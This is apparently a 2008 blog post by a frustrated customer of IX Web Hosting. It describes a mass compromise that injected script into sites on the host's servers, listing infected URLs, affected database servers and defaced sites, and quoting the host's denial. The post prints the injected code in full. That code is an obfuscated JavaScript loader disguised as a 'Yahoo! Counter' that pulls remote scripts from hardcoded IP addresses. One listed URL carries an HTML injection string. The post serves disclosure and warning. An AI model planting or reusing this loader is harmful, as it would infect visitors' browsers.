Because of a MASSIVE SECURITY ISSUE on IX WEB HOSTING’s SERVERS!!.. the script is NOT actually put onto any of your pages, the script is actually hidded somewhere on the server..

So far I have found 5 “seeds” .. These are the codes that are appearing  in  over 100,000 sites

• http://on3photo.com/onlinestore/photos/106-firefighter_foto/1147-gustav_deployment/di_img_0002.jpg 
• http://adventuresinstorytelling.com/modlogan/m_usage_200603_001_008.html

Remember to view the “source code” in the above links.

Very interesting is the second “seed” that is actually in an IX standard “modlogan” folder, that is standard a chmod 700 .

Secondly it should not be possible on any shared server to inject this script onto EVERY file on that server. The fact that this is happening means that IX web Hosting has not got a clue how to protect their servers, and customer web sites. 

So as you can see, this script IS  NOT actually put into your script, that is why you cannot find it.. HOWEVER, somewhere on your site, there is a bit of code  “Calling” this script, and that appears in your pages.
Check  ALL the pages that get called for every page, ie. header, footer, index, sidebar etc. 

So far I have evidence and proven that the following IX servers running the following Database’s  are seeded:

• mysql33.ixwebhosting.com
• mysql15.ixwebhosting.com
• mysql27.ixwebhosting.com

If you know of any others that are seeded, please let me know.

Hope this helps

:: Some people have contacted me to tell me that the Injected Script is ( also ) injected into the database, and in some cases a new table is created.
I have checked 9 databases of infected sites, and I have not yet come across the script in my Database’s, so I think that this might be “script” related, maybe that some scripts such as PhpBB2 allows for this to happen, so I recommend searching your Database for the script as well ::

IX and Hacked and Defaced Dec 24 2008

A  short list of sites hosted by IX Web Hosting.. all Hacked and Defaced

http://sw.rzep.net/

http://ebookdirectory.net/

http://www.strangeauction.com/wp-login.php 

http://annualkellyfamilyreunion.com/forum/

http://techworxs.com/forum/

http://sisterwords.com/phpBB2/

http://cr30beachbungalow.mmisiolek.com/phpBB2/

 

http://hitecpowercontrols.com/x.html

http://clearfork.com/phpBB2/

http://jacksonvilleyardsalesonline.com/signinform.php?msg=%3Ch1%3EHacked%20By%20BeLa%3C/h1%3E

http://hucad.com/

http://marybackstage.com/

http://abacusdiesel.com/phpBB2/

http://www.cardstuff.info/details.php?id=16&kategorie=9&main_kat=4&start=0&nr=

http://dexterb.com/

http://mediaportalen.net/index.php?n=modules/users&s=4&t=DESC&p=1&l=results_poll&68cac=off

http://forgottenstory.com/phpBB2/

 http://www.mobileintegration.no/

 http://krabbeteiner.com/shop/admin/

http://fischertechnologies.com/calendar/ 

http://www.scotlandsguesthouses.com/

http://infotop100.com/

http://www.coralenriquegranados.org/phpBB2/index.php

IX Web Hosting Injected TODAY

Dec. 19. 2008

I can confirm that IX web hosting’s server running database “mysql27.ixwebhosting.com” the site injected were on “ns5.ixwebhosting.com” , “ns6.ixwebhosting.com” has yet again been injected, this within a week after IX web hosting sent an email where it stated that all their servers were clean .. and I quote from the email sent by Fatima Said, CCO IX Web Hosting

“”  We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected. “”

This just goes to show that IX web hosting has not got a clue where to start looking and what to clean.

 

The injected code appears on every file:

<script language=javascript><!– Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape(‘%2F@/%3C~%64%69&v%20`s!t~%79l#e=%64%69%73p%6C%61~y~%3A%6Eo%6E%65%3E!\nd%6F$%63%75%6D%65%6E#%74%2E!w`r$%69$%74%65%28%22%3C%2F%74!%65~%78t%61!%72@%65&a&%3E@%22|)~%3B|v`a%72%20#%69,%5F`,a%3D![“!7$%38&%2E110~.1%37@%35`.!%321$%22%2C%22!%319~5~.24%2E|%37$%36#%2E%32%35%31%22%5D`%3B~_=~1!%3Bi|f(|do!c%75%6D%65nt@%2E~c#%6F%6F&%6B%69~%65%2E%6D&a~tc%68!(&%2F%5C#bh&%67&%66t@=1%2F)%3D$%3D$%6E|%75l&%6C`%29f#o%72(%69|=%30&%3B|i~%3C@%32!%3B%69+~%2B~%29d|ocu%6Dent%2E&%77~%72%69%74%65(“~%3C`s`c`r%69&p%74`%3E%69f|%28%5F@%29do%63%75m$%65`%6E%74`%2E%77~rit$%65|%28%5C|”#%3C#s&c&r@ip%74$%20%69@%64%3D!_~”+i+`%22_%20|%73%72%63!%3D%2F/#%22|+a#%5Bi|%5D%2B#%22/~%63!p%2F?`”%2B!n`%61#v&%69ga%74%6F!%72%2Ea%70%70`%4E%61%6De`%2Ec!%68$%61%72`A|t&(@0`%29#%2B%22#%3E%3C%5C%5C@/`%73%63@%72&i|p`t@%3E%5C|”~)`%3C#%5C&/!s~c$%72~%69$%70&t!%3E”)#;#\n%2F&%2F$%3C#%2F&d%69%76!%3E’).replace(/@|\!|#|\&|`|~|\||\$/g,””));var yahoo_counter=1;
<!– counter end –></script>

IX Web Hosting Hacked

IX Web Hosting has been  continuously hacked since April of 2008. Thousands of innocent paying customers are furious because of the way IX web hosting has handled the situation.
It has been a well known fact that hackers have seeded and are using IX web hostings servers to inject various scripts into every file on the vunerable server, infecting 1000’s of sites.

I myself had 7 personal  business accounts ( about 60 sites) with IX webhosting, I had them for 4 years, the first 3 years was plain sailing, I was happy with the service provided, and apart from the everyday minor hiccups, things went as they should have.
The trouble started this year 2008 when IX moved all their servers to a new location.

The sheer hosting hell that followed will be posted in the coming days / weeks / months / years

I will be posting links to other topics, printscreen images of support tickets, Emails between myself and IX web hosting, and links for innocent duped customers to file complaints against ixwebhosting.  

Please leave genuine feedback about your experience  with IX web hosting.